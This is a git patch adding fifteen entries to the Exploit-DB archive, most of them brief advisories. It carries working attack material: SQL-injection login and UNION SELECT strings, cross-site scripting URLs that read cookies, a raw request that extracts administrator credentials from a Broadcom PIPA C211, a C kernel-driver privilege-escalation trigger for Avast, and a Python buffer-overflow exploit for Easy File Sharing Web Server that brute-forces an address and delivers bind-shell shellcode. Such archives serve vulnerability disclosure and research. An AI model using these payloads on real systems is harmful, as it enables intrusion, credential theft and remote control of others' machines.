From 4d927f6c335dbe8b99d839f533cc83189ad32389 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 16 May 2014 04:36:04 +0000
Subject: [PATCH] Updated 05_16_2014

---
 files.csv                            |  14 ++++
 platforms/asp/webapps/33361.txt      |  17 ++++
 platforms/hardware/webapps/33353.txt |  49 +++++++++++
 platforms/linux/remote/33364.txt     |  13 +++
 platforms/multiple/remote/33363.txt  |  14 ++++
 platforms/php/webapps/33354.txt      |  13 +++
 platforms/php/webapps/33355.txt      |   9 ++
 platforms/php/webapps/33356.txt      |  10 +++
 platforms/php/webapps/33357.txt      |   9 ++
 platforms/php/webapps/33358.txt      |  12 +++
 platforms/php/webapps/33359.txt      |   9 ++
 platforms/php/webapps/33362.txt      |   9 ++
 platforms/php/webapps/33365.txt      |   9 ++
 platforms/windows/local/33360.c      |  88 ++++++++++++++++++++
 platforms/windows/remote/33352.py    | 118 +++++++++++++++++++++++++++
 15 files changed, 393 insertions(+)
 create mode 100755 platforms/asp/webapps/33361.txt
 create mode 100755 platforms/hardware/webapps/33353.txt
 create mode 100755 platforms/linux/remote/33364.txt
 create mode 100755 platforms/multiple/remote/33363.txt
 create mode 100755 platforms/php/webapps/33354.txt
 create mode 100755 platforms/php/webapps/33355.txt
 create mode 100755 platforms/php/webapps/33356.txt
 create mode 100755 platforms/php/webapps/33357.txt
 create mode 100755 platforms/php/webapps/33358.txt
 create mode 100755 platforms/php/webapps/33359.txt
 create mode 100755 platforms/php/webapps/33362.txt
 create mode 100755 platforms/php/webapps/33365.txt
 create mode 100755 platforms/windows/local/33360.c
 create mode 100755 platforms/windows/remote/33352.py

diff --git a/files.csv b/files.csv
index 3edd85333..d4a8c9f43 100755
--- a/files.csv
+++ b/files.csv
@@ -30065,3 +30065,17 @@ id,file,description,date,author,platform,type,port
 33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0
 33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service Vulnerability",2009-11-12,HACKATTACK,windows,dos,0
 33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 '/dhost/modules?I:' Buffer Overflow Vulnerability",2009-11-12,HACKATTACK,novell,remote,0
+33352,platforms/windows/remote/33352.py,"Easy File Sharing Web Server 6.8 - Stack Buffer Overflow",2014-05-14,superkojiman,windows,remote,80
+33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80
+33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
+33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
+33356,platforms/php/webapps/33356.txt,"PHD Help Desk 1.43 area_list.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
+33357,platforms/php/webapps/33357.txt,"PHD Help Desk 1.43 atributo.php URL Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
+33358,platforms/php/webapps/33358.txt,"PHD Help Desk 1.43 atributo_list.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
+33359,platforms/php/webapps/33359.txt,"PHD Help Desk 1.43 caso_insert.php URL Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
+33360,platforms/windows/local/33360.c,"Avast! Antivirus <= 4.8.1356 'aswRdr.sys' Driver Local Privilege Escalation Vulnerability",2009-11-16,Evilcry,windows,local,0
+33361,platforms/asp/webapps/33361.txt,"Multiple JiRo's Products 'files/login.asp' Multiple SQL Injection Vulnerabilities",2009-11-17,blackenedsecurity,asp,webapps,0
+33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 'productId' Parameter SQL Injection Vulnerability",2009-11-19,"Sangte Amtham",php,webapps,0
+33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 'dtoa()' Remote Code Execution Vulnerability",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0
+33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 KDELibs 'dtoa()' Remote Code Execution Vulnerability",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0
+33365,platforms/php/webapps/33365.txt,"WordPress WP-PHPList Plugin 2.10.2 'unsubscribeemail' Parameter Cross-Site Scripting Vulnerability",2009-11-29,MustLive,php,webapps,0
diff --git a/platforms/asp/webapps/33361.txt b/platforms/asp/webapps/33361.txt
new file mode 100755
index 000000000..0534bd7ee
--- /dev/null
+++ b/platforms/asp/webapps/33361.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/37045/info
+
+Multiple JiRo's products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the applications, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following products are affected:
+
+JBS 2.0
+JBSX
+
+Other products may also be affected.
+
+The following proof-of-concept login and password examples are available:
+
+admin 'or' '='
+password 'or' '=' 
\ No newline at end of file
diff --git a/platforms/hardware/webapps/33353.txt b/platforms/hardware/webapps/33353.txt
new file mode 100755
index 000000000..414c76861
--- /dev/null
+++ b/platforms/hardware/webapps/33353.txt
@@ -0,0 +1,49 @@
+Vulnerability title: Unauthenticated Credential And Configuration
+Retrieval In Broadcom Ltd PIPA C211
+CVE: CVE-2014-2046
+Vendor: Broadcom Ltd
+Product: PIPA C211
+Affected version: Soft Rev: SR1.1, HW Rev: PIPA C211 rev2
+Fixed version: N/A
+Reported by: Jerzy Kramarz
+
+Details:
+
+By sending the following request to the BROADCOM PIPA C211 web interface it is possible to retrieve complete system configuration including administrative credentials, SMTP community strings, FTP upload credentials and all other system user credentials:
+
+POST /cgi-bin/rpcBridge HTTP/1.1
+Host: <IP>
+Proxy-Connection: keep-alive
+Content-Length: 574
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36
+Origin: http://<IP>
+Content-Type: text/xml
+Accept: */*
+DNT: 1
+Referer: http://:<IP>/
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4
+
+<methodCall><methodName>config.getValuesHashExcludePaths</methodName><params><param><value><string>sys</string></value></param><param><value><int>0</int></value></param><param><value><int>0</int></value></param><param><value><array><data><value><string>sys.applications.aptcodec.horizonnextgen.status</string></value><value><string>sys.applications.aptcodec.horizonnextgen.configuration</string></value></data></array></value></param></params></methodCall>
+
+        
+
+Further details at:
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/
+
+
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2014, All rights
+reserved worldwide. Permission is hereby granted for the electronic
+redistribution of this information. It is not to be edited or altered in
+any way without the express written consent of Portcullis Computer
+Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this
+information constitutes acceptance for use in an AS IS condition. There
+are NO warranties, implied or otherwise, with regard to this information
+or its use. Any use of this information is at the user's risk. In no
+event shall the author/distributor (Portcullis Computer Security
+Limited) be held liable for any damages whatsoever arising out of or in
+connection with the use or spread of this information.
\ No newline at end of file
diff --git a/platforms/linux/remote/33364.txt b/platforms/linux/remote/33364.txt
new file mode 100755
index 000000000..f5dcb3de5
--- /dev/null
+++ b/platforms/linux/remote/33364.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37080/info
+
+KDE is prone to a remote code-execution vulnerability that affects KDELibs.
+
+Successful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.
+
+NOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.
+
+This issue affects KDE KDELibs 4.3.3; other versions may also be affected.
+
+<script>
+var a=0.<?php echo str_repeat("1",296450); ?>;
+</script> 
\ No newline at end of file
diff --git a/platforms/multiple/remote/33363.txt b/platforms/multiple/remote/33363.txt
new file mode 100755
index 000000000..3128de2be
--- /dev/null
+++ b/platforms/multiple/remote/33363.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/37078/info
+
+Opera Web Browser is prone to a remote code-execution vulnerability.
+
+Successful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.
+
+NOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.
+
+This issue affects Opera 10.01; other versions may also be affected. 
+
+
+<script>
+var a=0.<?php echo str_repeat("1",296450); ?>;
+</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/33354.txt b/platforms/php/webapps/33354.txt
new file mode 100755
index 000000000..37c124e28
--- /dev/null
+++ b/platforms/php/webapps/33354.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37029/info
+
+PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+PHD Help Desk 1.43 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/area.php/[code]
+http://www.example.com/area.php?pagina=[code]
+http://www.example.com/area.php?sentido=[code]
+http://www.example.com/area.php?q_registros=[code]
+http://www.example.com/area.php?orden=[code]
\ No newline at end of file
diff --git a/platforms/php/webapps/33355.txt b/platforms/php/webapps/33355.txt
new file mode 100755
index 000000000..3a65697ed
--- /dev/null
+++ b/platforms/php/webapps/33355.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37029/info
+ 
+PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+ 
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+ 
+PHD Help Desk 1.43 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/solic_display.php?pagina=1&q_registros=[code]&orden=seq_solicitud_id
\ No newline at end of file
diff --git a/platforms/php/webapps/33356.txt b/platforms/php/webapps/33356.txt
new file mode 100755
index 000000000..1948f80d0
--- /dev/null
+++ b/platforms/php/webapps/33356.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37029/info
+  
+PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+  
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+  
+PHD Help Desk 1.43 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/area_list.php/[code]
+http://www.example.com/area_list.php?pagina=1&q_registros=0[code]&orden=nombre
\ No newline at end of file
diff --git a/platforms/php/webapps/33357.txt b/platforms/php/webapps/33357.txt
new file mode 100755
index 000000000..d9aa392bb
--- /dev/null
+++ b/platforms/php/webapps/33357.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37029/info
+   
+PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+   
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+   
+PHD Help Desk 1.43 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/atributo.php/[code]
\ No newline at end of file
diff --git a/platforms/php/webapps/33358.txt b/platforms/php/webapps/33358.txt
new file mode 100755
index 000000000..01064c031
--- /dev/null
+++ b/platforms/php/webapps/33358.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37029/info
+    
+PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+    
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+    
+PHD Help Desk 1.43 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/atributo_list.php?pagina=1[code]&q_registros=15&orden=activo&sentido
+http://www.example.com/atributo_list.php?pagina=1&q_registros=15[code]&orden=activo&sentido
+http://www.example.com/atributo_list.php?pagina=1&q_registros=15&orden=activo[code]&sentido
+http://www.example.com/atributo_list.php?pagina=1&q_registros=15&orden=activo&sentido[code]
\ No newline at end of file
diff --git a/platforms/php/webapps/33359.txt b/platforms/php/webapps/33359.txt
new file mode 100755
index 000000000..547f41792
--- /dev/null
+++ b/platforms/php/webapps/33359.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37029/info
+     
+PHD Help Desk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+     
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+     
+PHD Help Desk 1.43 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/caso_insert.php/[code] 
\ No newline at end of file
diff --git a/platforms/php/webapps/33362.txt b/platforms/php/webapps/33362.txt
new file mode 100755
index 000000000..a649234e5
--- /dev/null
+++ b/platforms/php/webapps/33362.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37065/info
+
+CubeCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The issue affects CubeCart 4.3.6; prior versions may also be affected. 
+
+http://www.example.com/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version() 
\ No newline at end of file
diff --git a/platforms/php/webapps/33365.txt b/platforms/php/webapps/33365.txt
new file mode 100755
index 000000000..be75feb0a
--- /dev/null
+++ b/platforms/php/webapps/33365.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37096/info
+
+The WP-PHPList plugin for WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+WP-PHPList 2.10.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-phplist.php?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/windows/local/33360.c b/platforms/windows/local/33360.c
new file mode 100755
index 000000000..468e12d81
--- /dev/null
+++ b/platforms/windows/local/33360.c
@@ -0,0 +1,88 @@
+source: http://www.securityfocus.com/bid/37031/info
+
+Avast! Antivirus is prone to a local privilege-escalation vulnerability.
+
+Local attackers can exploit this issue to execute arbitrary code with superuser privileges and completely compromise the affected computer. Failed exploit attempts will result in a denial-of-service condition.
+
+Avast! Antivirus 4.8.1356 is vulnerable; other versions may also be affected.
+
+/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
+*
+* Author(s): Giuseppe 'Evilcry' Bonfa'
+*            AbdulAziz Hariri
+* E-Mail: evilcry _AT_ gmail _DOT_ com
+* Website: http://evilcry.netsons.org
+*          http://evilcodecave.blogspot.com
+*          http://evilcodecave.wordpress.com
+*     http://evilfingers.com
+*
+*  Disclosure Timeline: As specified in the Advisory.
+*/
+
+#define WIN32_LEAN_AND_MEAN
+#include
+#include
+
+
+BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
+{
+ WCHAR DeviceName[MAX_PATH];
+ HANDLE hDevice;
+
+ if ((GetVersion() & 0xFF) >= 5)
+ {
+  wcscpy(DeviceName, L"\\\\.\\Global\\");
+ }
+ else
+ {
+  wcscpy(DeviceName, L"\\\\.\\");
+ }
+
+ wcscat(DeviceName, DriverName);
+
+ printf("Opening.. %S\n", DeviceName);
+
+ hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0,
+NULL, OPEN_EXISTING,
+  FILE_ATTRIBUTE_NORMAL, NULL);
+
+ if (hDevice == INVALID_HANDLE_VALUE)
+ {
+  printf("CreateFile() ERROR %d\n", GetLastError());
+  return FALSE;
+ }
+
+ *lphDevice = hDevice;
+
+ return TRUE;
+}
+
+int main()
+{
+ HANDLE hDev = NULL;
+ DWORD Junk;
+
+ if(!OpenDevice(L"aswRDR",&hDev))
+ {
+  printf("Unable to access aswMon");
+  return(0);
+ }
+
+ char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE |
+MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+ if (Buff)
+ {
+  memset(Buff, 'A', 0x156);
+
+DeviceIoControl(hDev,0x80002024,Buff,0x156,Buff,0x156,&Junk,(LPOVERLAPPED)NULL);
+  printf("DeviceIoControl Executed..\n");
+ }
+ else
+ {
+  printf("VirtualAlloc() ERROR %d\n", GetLastError());
+ }
+
+
+ return(0);
+}
diff --git a/platforms/windows/remote/33352.py b/platforms/windows/remote/33352.py
new file mode 100755
index 000000000..b78976d1b
--- /dev/null
+++ b/platforms/windows/remote/33352.py
@@ -0,0 +1,118 @@
+# Exploit Title: Easy File Sharing Web Server 6.8 stack buffer overflow
+# Date: 10 May 2014
+# Exploit Author: superkojiman - http://www.techorganic.com
+# Vendor Homepage: http://www.efssoft.com
+# Software Link: http://www.sharing-file.com/efssetup.exe
+# Version: 6.8
+# Tested on: English version of Windows XP Professional SP2 and SP3
+#
+# Description: 
+# By setting UserID in the cookie to a long string, we can overwrite EDX which 
+# allows us to control execution flow when the following instruction is 
+# executed:
+#
+# 0x0045C8C2: CALL DWORD PTR DS:[EDX+28]
+#
+# We can point EDX+28 to a location in the stack containing a pointer to 
+# instructions we want to execute. This pointer can be placed at 0x01??6969. 
+# Under Windows XP Professional SP2/SP3, the first, third, and fourth bytes 
+# in the address are always the same. The second byte is random so we need 
+# to bruteforce it. This takes at most 255 tries and the server doesn't crash 
+# so we can keep trying. 
+#
+# The pointer placed at 0x01??6969 is a pointer to a CALL ESI. ESI points to 
+# a small space in our payload. We fill this small space with instructions to 
+# jump further down the stack where our shellcode is stored. 
+#
+# Tested with Easy File Sharing Webserver installed in the default location at 
+# C:\EFS Software\Easy File Sharing Web Server
+#
+
+import socket
+import struct
+import time
+import sys
+
+target = "192.168.1.140"
+port = 80
+
+# Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/
+# Binds a shell on port 28876
+# msfencode -b '\x00\x20' -i w32-bind-ngs-shellcode.bin 
+# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
+shellcode = ( 
+"\xbb\xa1\x68\xde\x7c\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9" +
+"\xb1\x36\x31\x58\x14\x83\xe8\xfc\x03\x58\x10\x43\x9d\xef" +
+"\xb5\xe7\xd5\x61\x76\x6c\x9f\x8d\xfd\x04\x7c\x05\x6f\xe0" +
+"\xf7\x67\x50\x7b\x31\xa0\xdf\x63\x4b\x23\x8e\xfb\x81\x9c" +
+"\x02\xc9\x8d\x44\x33\x5a\x3d\xe1\x0c\x2b\xc8\x69\xfb\xd5" +
+"\x7e\x8a\xd5\xd5\xa8\x41\xac\x02\x7c\xaa\x05\x8d\xd0\x0c" +
+"\x0b\x5a\x82\x0d\x44\x48\x80\x5d\x10\xcd\xf4\xea\x7a\xf0" +
+"\x7c\xec\x69\x81\x36\xce\x6c\x7c\x9e\x3f\xbd\x3c\x94\x74" +
+"\xd0\xc1\x44\xc0\xe4\x6d\xac\x58\x21\xa9\xf1\xeb\x44\xc6" +
+"\x30\x2b\xd2\xc3\x1b\xb8\x57\x37\xa5\x57\x68\x80\xb1\xf6" +
+"\xfc\xa5\xa5\xf9\xeb\xb0\x3e\xfa\xef\x53\x15\x7d\xd1\x5a" +
+"\x1f\x76\xa3\x02\xdb\xd5\x44\x6a\xb4\x4c\x3a\xb4\x48\x1a" +
+"\x8a\x96\x03\x1b\x3c\x8b\xa3\x34\x28\x52\x74\x4b\xac\xdb" +
+"\xb8\xd9\x43\xb4\x13\x48\x9b\xea\xe9\xb3\x17\xf2\xc3\xe1" +
+"\x8a\x6a\x47\x6b\x4f\x4a\x0a\x0f\xab\xb2\xbf\x5b\x18\x04" +
+"\xf8\x72\x5e\xdc\x80\xb9\x45\x8b\xdc\x93\xd7\xf5\xa6\xfc" +
+"\xd0\xae\x7a\x51\xb6\x02\x84\x03\xdc\x29\x3c\x50\xf5\xe7" +
+"\x3e\x57\xf9"
+)
+
+print "[+] We're guessing an address on the stack. It will be a few minutes..."
+
+for i in xrange(1,255):
+    n = ""
+    if i < 16:
+        n = "0" + hex(i)[-1]
+    else:
+        n = hex(i)[2:]
+
+    # craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28]
+    guess = "0x01" + n + "6940"
+    sys.stdout.write("=");
+ 
+    payload =  "A"*64                            # padding
+    payload += "\x81\xee\x70\xff\xff\xff"        # SUB ESI,-90
+    payload += "\xff\xe6"                        # JMP ESI
+
+    payload += "A"*8                             # padding
+    payload += struct.pack("<I", int(guess, 16)) # overwrite EDX with 
+                                                 # pointer to CALL ESI
+
+    payload += "C"*108                           # padding
+    payload += struct.pack("<I", 0x10023701)     # pointer to CALL ESI
+    payload += "\x90"*20                         # NOP sled
+    payload += shellcode                         # calc.exe
+
+    # craft the request
+    buf = (
+    "GET /vfolder.ghp HTTP/1.1\r\n"
+    "User-Agent: Mozilla/4.0\r\n"
+    "Host:" + target + ":" + str(port) + "\r\n"
+    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+    "Accept-Language: en-us\r\n"
+    "Accept-Encoding: gzip, deflate\r\n"
+    "Referer: http://" + target + "/\r\n"
+    "Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=;\r\n"
+    "Conection: Keep-Alive\r\n\r\n"
+    )
+
+    # send the request and payload to the server
+    s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s1.connect((target, port))
+    s1.send(buf)
+    s1.close()
+    
+    try:
+        # check if we guessed the correct address by connecting to port 28876
+        s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s2.connect((target, 28876))
+        s2.close()
+        print "\n[+] Success! A shell is waiting on port 28876!"
+        break
+    except Exception,e:
+        pass
+